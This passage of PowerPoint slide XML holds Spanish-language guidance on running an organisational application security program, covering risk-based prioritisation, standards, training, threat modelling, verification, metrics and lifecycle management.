                    <a:pt x="1112554" y="2"/>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7695" tIns="180079" rIns="147694" bIns="180080" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>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Identificar y establecer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0"/>
                </a:rPr>
                <a:t>prioridades en su catálogo de aplicaciones</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en base al riesgo inherente asociado al negocio, guiadas por las leyes de privacidad aplicables y otras regulaciones relevantes a los activos de datos a ser protegidos.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"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Establecer un modelo de calificación de riesgo común, con un conjunto consistente de factores de impacto y probabilidad, que reflejen la tolerancia al riesgo de la organización.</a:t>
              </a:r>
              <a:endParaRPr lang="es-ES"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Medir y priorizar de forma acorde todas las aplicaciones y APIs. Adicionar los resultados al CMDB.</a:t>
              </a:r>
              <a:endParaRPr lang="es-ES"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Establecer directrices para garantizar y definir los niveles de cobertura y rigor requeridos.</a:t>
              </a:r>
              <a:endParaRPr lang="es-ES"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1" name="Forma libre: forma 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E914B17-7DCC-414D-A1CE-72ADDCD7F790}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="4913531"/>
              <a:ext cx="990000" cy="1233983"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1028927"/>
                <a:gd name="connsiteY0" fmla="*/ 171491 h 1233983"/>
                <a:gd name="connsiteX1" fmla="*/ 171491 w 1028927"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1233983"/>
                <a:gd name="connsiteX2" fmla="*/ 857436 w 1028927"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1233983"/>
                <a:gd name="connsiteX3" fmla="*/ 1028927 w 1028927"/>
                <a:gd name="connsiteY3" fmla="*/ 171491 h 1233983"/>
                <a:gd name="connsiteX4" fmla="*/ 1028927 w 1028927"/>
                <a:gd name="connsiteY4" fmla="*/ 1062492 h 1233983"/>
                <a:gd name="connsiteX5" fmla="*/ 857436 w 1028927"/>
                <a:gd name="connsiteY5" fmla="*/ 1233983 h 1233983"/>
                <a:gd name="connsiteX6" fmla="*/ 171491 w 1028927"/>
                <a:gd name="connsiteY6" fmla="*/ 1233983 h 1233983"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1028927"/>
                <a:gd name="connsiteY7" fmla="*/ 1062492 h 1233983"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1028927"/>
                <a:gd name="connsiteY8" fmla="*/ 171491 h 123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927" h="1233983">
                  <a:moveTo>
                    <a:pt x="0" y="171491"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="76779"/>
                    <a:pt x="76779" y="0"/>
                    <a:pt x="171491" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="857436" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="952148" y="0"/>
                    <a:pt x="1028927" y="76779"/>
                    <a:pt x="1028927" y="171491"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1028927" y="1062492"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1028927" y="1157204"/>
                    <a:pt x="952148" y="1233983"/>
                    <a:pt x="857436" y="1233983"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="171491" y="1233983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="76779" y="1233983"/>
                    <a:pt x="0" y="1157204"/>
                    <a:pt x="0" y="1062492"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="17149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8328" tIns="69278" rIns="88328" bIns="69278" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500" rtl="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="1000" b="1" kern="1200" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Enfoque basado en el catálogo de riesgos</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="100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Forma libre: forma 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B025BB33-AC86-4585-8801-6F21EC16885C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1148985" y="6256507"/>
              <a:ext cx="5559552" cy="1036754"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1093806"/>
                <a:gd name="connsiteY0" fmla="*/ 182305 h 5559552"/>
                <a:gd name="connsiteX1" fmla="*/ 182305 w 1093806"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX2" fmla="*/ 911501 w 1093806"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX3" fmla="*/ 1093806 w 1093806"/>
                <a:gd name="connsiteY3" fmla="*/ 182305 h 5559552"/>
                <a:gd name="connsiteX4" fmla="*/ 1093806 w 1093806"/>
                <a:gd name="connsiteY4" fmla="*/ 5377247 h 5559552"/>
                <a:gd name="connsiteX5" fmla="*/ 911501 w 1093806"/>
                <a:gd name="connsiteY5" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX6" fmla="*/ 182305 w 1093806"/>
                <a:gd name="connsiteY6" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1093806"/>
                <a:gd name="connsiteY7" fmla="*/ 5377247 h 5559552"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1093806"/>
                <a:gd name="connsiteY8" fmla="*/ 182305 h 555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3806" h="5559552">
                  <a:moveTo>
                    <a:pt x="1057939" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1077748" y="0"/>
                    <a:pt x="1093806" y="414860"/>
                    <a:pt x="1093806" y="926612"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1093806" y="4632940"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1093806" y="5144692"/>
                    <a:pt x="1077748" y="5559552"/>
                    <a:pt x="1057939" y="5559552"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35867" y="5559552"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16058" y="5559552"/>
                    <a:pt x="0" y="5144692"/>
                    <a:pt x="0" y="4632940"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="926612"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="414860"/>
                    <a:pt x="16058" y="0"/>
                    <a:pt x="35867" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1057939" y="0"/>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4835" tIns="177220" rIns="144835" bIns="177220" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>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Establecer un conjunto de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1"/>
                </a:rPr>
                <a:t>políticas y estándares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que proporcionen una base de referencia de seguridad de las aplicaciones, a las cuales todo el equipo de desarrollo debe adherirse.</a:t>
              </a:r>
            </a:p>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Definir un conjunto de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2"/>
                </a:rPr>
                <a:t>controles de seguridad reutilizables</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que complemente esas políticas y estándares y proporcionen una guía en su uso en el diseño y desarrollo.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="2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Establecer un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3"/>
                </a:rPr>
                <a:t>perfil de formación en seguridad en aplicaciones</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que sea un requisito, dirigido a los diferentes roles y tecnologías de desarrollo.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Forma libre: forma 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{945F58F3-9250-4B33-BF4E-1606E6003907}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="6256507"/>
              <a:ext cx="990000" cy="1041663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY0" fmla="*/ 156485 h 1233983"/>
                <a:gd name="connsiteX1" fmla="*/ 156485 w 938893"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1233983"/>
                <a:gd name="connsiteX2" fmla="*/ 782408 w 938893"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1233983"/>
                <a:gd name="connsiteX3" fmla="*/ 938893 w 938893"/>
                <a:gd name="connsiteY3" fmla="*/ 156485 h 1233983"/>
                <a:gd name="connsiteX4" fmla="*/ 938893 w 938893"/>
                <a:gd name="connsiteY4" fmla="*/ 1077498 h 1233983"/>
                <a:gd name="connsiteX5" fmla="*/ 782408 w 938893"/>
                <a:gd name="connsiteY5" fmla="*/ 1233983 h 1233983"/>
                <a:gd name="connsiteX6" fmla="*/ 156485 w 938893"/>
                <a:gd name="connsiteY6" fmla="*/ 1233983 h 1233983"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY7" fmla="*/ 1077498 h 1233983"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY8" fmla="*/ 156485 h 123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8893" h="1233983">
                  <a:moveTo>
                    <a:pt x="0" y="156485"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70061"/>
                    <a:pt x="70061" y="0"/>
                    <a:pt x="156485" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="782408" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="868832" y="0"/>
                    <a:pt x="938893" y="70061"/>
                    <a:pt x="938893" y="156485"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="938893" y="1077498"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="938893" y="1163922"/>
                    <a:pt x="868832" y="1233983"/>
                    <a:pt x="782408" y="1233983"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156485" y="1233983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70061" y="1233983"/>
                    <a:pt x="0" y="1163922"/>
                    <a:pt x="0" y="1077498"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="15648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33" tIns="64883" rIns="83933" bIns="64883" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-ES" sz="1000" b="1" kern="1200" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Contar con una base sólida</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="100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Forma libre: forma 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD38BE44-DFA0-4479-959A-D4B9E7D3C650}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1148985" y="7428818"/>
              <a:ext cx="5559553" cy="1036754"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 926517"/>
                <a:gd name="connsiteY0" fmla="*/ 154423 h 5559552"/>
                <a:gd name="connsiteX1" fmla="*/ 154423 w 926517"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX2" fmla="*/ 772094 w 926517"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX3" fmla="*/ 926517 w 926517"/>
                <a:gd name="connsiteY3" fmla="*/ 154423 h 5559552"/>
                <a:gd name="connsiteX4" fmla="*/ 926517 w 926517"/>
                <a:gd name="connsiteY4" fmla="*/ 5405129 h 5559552"/>
                <a:gd name="connsiteX5" fmla="*/ 772094 w 926517"/>
                <a:gd name="connsiteY5" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX6" fmla="*/ 154423 w 926517"/>
                <a:gd name="connsiteY6" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 926517"/>
                <a:gd name="connsiteY7" fmla="*/ 5405129 h 5559552"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 926517"/>
                <a:gd name="connsiteY8" fmla="*/ 154423 h 555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517" h="5559552">
                  <a:moveTo>
                    <a:pt x="900782" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="914995" y="3"/>
                    <a:pt x="926517" y="414864"/>
                    <a:pt x="926517" y="926615"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="926517" y="4632937"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="926517" y="5144688"/>
                    <a:pt x="914995" y="5559549"/>
                    <a:pt x="900782" y="5559549"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25735" y="5559549"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11522" y="5559549"/>
                    <a:pt x="0" y="5144688"/>
                    <a:pt x="0" y="4632937"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="926615"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="414864"/>
                    <a:pt x="11522" y="3"/>
                    <a:pt x="25735" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="900782" y="3"/>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36670" tIns="169054" rIns="136669" bIns="169055" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="3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Definir actividades de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4"/>
                </a:rPr>
                <a:t>implementación segura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y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5"/>
                </a:rPr>
                <a:t>verificación</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en los procesos operativos y de desarrollo existentes.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="3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Definir actividades como el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6"/>
                </a:rPr>
                <a:t>modelado de amenazas</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diseño y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7"/>
                </a:rPr>
                <a:t>revisión de seguridad</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8"/>
                </a:rPr>
                <a:t>revisión de código</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19"/>
                </a:rPr>
                <a:t>pruebas de intrusión</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y remediación.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="3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Para tener éxito, proporcionar expertos en la materia y </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20"/>
                </a:rPr>
                <a:t>servicios de apoyo a los equipos de desarrollo y del proyecto</a:t>
              </a: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16" name="Forma libre: forma 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D887B12C-FA80-48ED-A327-3E668322316E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="7417626"/>
              <a:ext cx="990000" cy="1054199"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY0" fmla="*/ 156485 h 1232065"/>
                <a:gd name="connsiteX1" fmla="*/ 156485 w 938893"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1232065"/>
                <a:gd name="connsiteX2" fmla="*/ 782408 w 938893"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1232065"/>
                <a:gd name="connsiteX3" fmla="*/ 938893 w 938893"/>
                <a:gd name="connsiteY3" fmla="*/ 156485 h 1232065"/>
                <a:gd name="connsiteX4" fmla="*/ 938893 w 938893"/>
                <a:gd name="connsiteY4" fmla="*/ 1075580 h 1232065"/>
                <a:gd name="connsiteX5" fmla="*/ 782408 w 938893"/>
                <a:gd name="connsiteY5" fmla="*/ 1232065 h 1232065"/>
                <a:gd name="connsiteX6" fmla="*/ 156485 w 938893"/>
                <a:gd name="connsiteY6" fmla="*/ 1232065 h 1232065"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY7" fmla="*/ 1075580 h 1232065"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY8" fmla="*/ 156485 h 123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8893" h="1232065">
                  <a:moveTo>
                    <a:pt x="0" y="156485"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70061"/>
                    <a:pt x="70061" y="0"/>
                    <a:pt x="156485" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="782408" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="868832" y="0"/>
                    <a:pt x="938893" y="70061"/>
                    <a:pt x="938893" y="156485"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="938893" y="1075580"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="938893" y="1162004"/>
                    <a:pt x="868832" y="1232065"/>
                    <a:pt x="782408" y="1232065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156485" y="1232065"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70061" y="1232065"/>
                    <a:pt x="0" y="1162004"/>
                    <a:pt x="0" y="1075580"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="15648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7743" tIns="66788" rIns="87743" bIns="66788" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="466725">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>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Integrar la Seguridad en los procesos existentes</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="100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Forma libre: forma 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D35C99CC-5862-4111-9F08-CE820510B465}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1148985" y="8597823"/>
              <a:ext cx="5559553" cy="1091459"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1104897"/>
                <a:gd name="connsiteY0" fmla="*/ 184153 h 5559552"/>
                <a:gd name="connsiteX1" fmla="*/ 184153 w 1104897"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX2" fmla="*/ 920744 w 1104897"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX3" fmla="*/ 1104897 w 1104897"/>
                <a:gd name="connsiteY3" fmla="*/ 184153 h 5559552"/>
                <a:gd name="connsiteX4" fmla="*/ 1104897 w 1104897"/>
                <a:gd name="connsiteY4" fmla="*/ 5375399 h 5559552"/>
                <a:gd name="connsiteX5" fmla="*/ 920744 w 1104897"/>
                <a:gd name="connsiteY5" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX6" fmla="*/ 184153 w 1104897"/>
                <a:gd name="connsiteY6" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1104897"/>
                <a:gd name="connsiteY7" fmla="*/ 5375399 h 5559552"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1104897"/>
                <a:gd name="connsiteY8" fmla="*/ 184153 h 555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897" h="5559552">
                  <a:moveTo>
                    <a:pt x="1068299" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1088511" y="3"/>
                    <a:pt x="1104897" y="414859"/>
                    <a:pt x="1104897" y="926611"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1104897" y="4632941"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1104897" y="5144693"/>
                    <a:pt x="1088511" y="5559549"/>
                    <a:pt x="1068299" y="5559549"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36598" y="5559549"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16386" y="5559549"/>
                    <a:pt x="0" y="5144693"/>
                    <a:pt x="0" y="4632941"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="926611"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="414859"/>
                    <a:pt x="16386" y="3"/>
                    <a:pt x="36598" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1068299" y="3"/>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5378" tIns="177762" rIns="145377" bIns="177763" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="3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Gestionar a través de las métricas. Manejar las decisiones de mejora y provisión de recursos económicos, basándose en las métricas y el análisis de los datos capturados. Las métricas incluyen el seguimiento de las prácticas y actividades de seguridad, las vulnerabilidades presentes y las mitigadas, la cobertura de la aplicación, densidad de defectos por tipo y cantidad de instancias, etc.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="9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Analizar los datos de las actividades de implementación y verificación para buscar el origen de la causa y los patrones en las vulnerabilidades, para poder determinar mejoras estratégicas en la organización y el negocio.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Forma libre: forma 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F24A46-9B2F-46F8-8484-1BFAFDEA0C0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="8597824"/>
              <a:ext cx="990000" cy="1091460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY0" fmla="*/ 156485 h 1232065"/>
                <a:gd name="connsiteX1" fmla="*/ 156485 w 938893"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1232065"/>
                <a:gd name="connsiteX2" fmla="*/ 782408 w 938893"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1232065"/>
                <a:gd name="connsiteX3" fmla="*/ 938893 w 938893"/>
                <a:gd name="connsiteY3" fmla="*/ 156485 h 1232065"/>
                <a:gd name="connsiteX4" fmla="*/ 938893 w 938893"/>
                <a:gd name="connsiteY4" fmla="*/ 1075580 h 1232065"/>
                <a:gd name="connsiteX5" fmla="*/ 782408 w 938893"/>
                <a:gd name="connsiteY5" fmla="*/ 1232065 h 1232065"/>
                <a:gd name="connsiteX6" fmla="*/ 156485 w 938893"/>
                <a:gd name="connsiteY6" fmla="*/ 1232065 h 1232065"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY7" fmla="*/ 1075580 h 1232065"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 938893"/>
                <a:gd name="connsiteY8" fmla="*/ 156485 h 1232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8893" h="1232065">
                  <a:moveTo>
                    <a:pt x="0" y="156485"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70061"/>
                    <a:pt x="70061" y="0"/>
                    <a:pt x="156485" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="782408" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="868832" y="0"/>
                    <a:pt x="938893" y="70061"/>
                    <a:pt x="938893" y="156485"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="938893" y="1075580"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="938893" y="1162004"/>
                    <a:pt x="868832" y="1232065"/>
                    <a:pt x="782408" y="1232065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156485" y="1232065"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70061" y="1232065"/>
                    <a:pt x="0" y="1162004"/>
                    <a:pt x="0" y="1075580"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="156485"/>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7743" tIns="66788" rIns="87743" bIns="66788" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="466725">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>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Proporcionar visibilidad a la gestión</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21488536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s-AR" sz="1600" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Administrar el Ciclo de Vida Completo de la Aplicación</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s-AR"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Las aplicaciones son algunos de los sistemas más complejos que los humanos crean y mantienen. La administración TI (Tecnología de la Información) para una aplicación debería ser ejecutada por especialistas en TI que sean responsables por el ciclo de vida completo de la misma. Sugerimos la creación de un administrador para cada aplicación a los efectos de proveer una contraparte técnica al dueño de la aplicación. El administrador se encarga de todo el ciclo de vida de la aplicación desde el punto de vista de TI, desde la recopilación de los requisitos hasta el proceso de retiro de los sistemas, que a menudo se pasa por alto</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s-AR" noProof="0" dirty="0"/>
              <a:t>+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
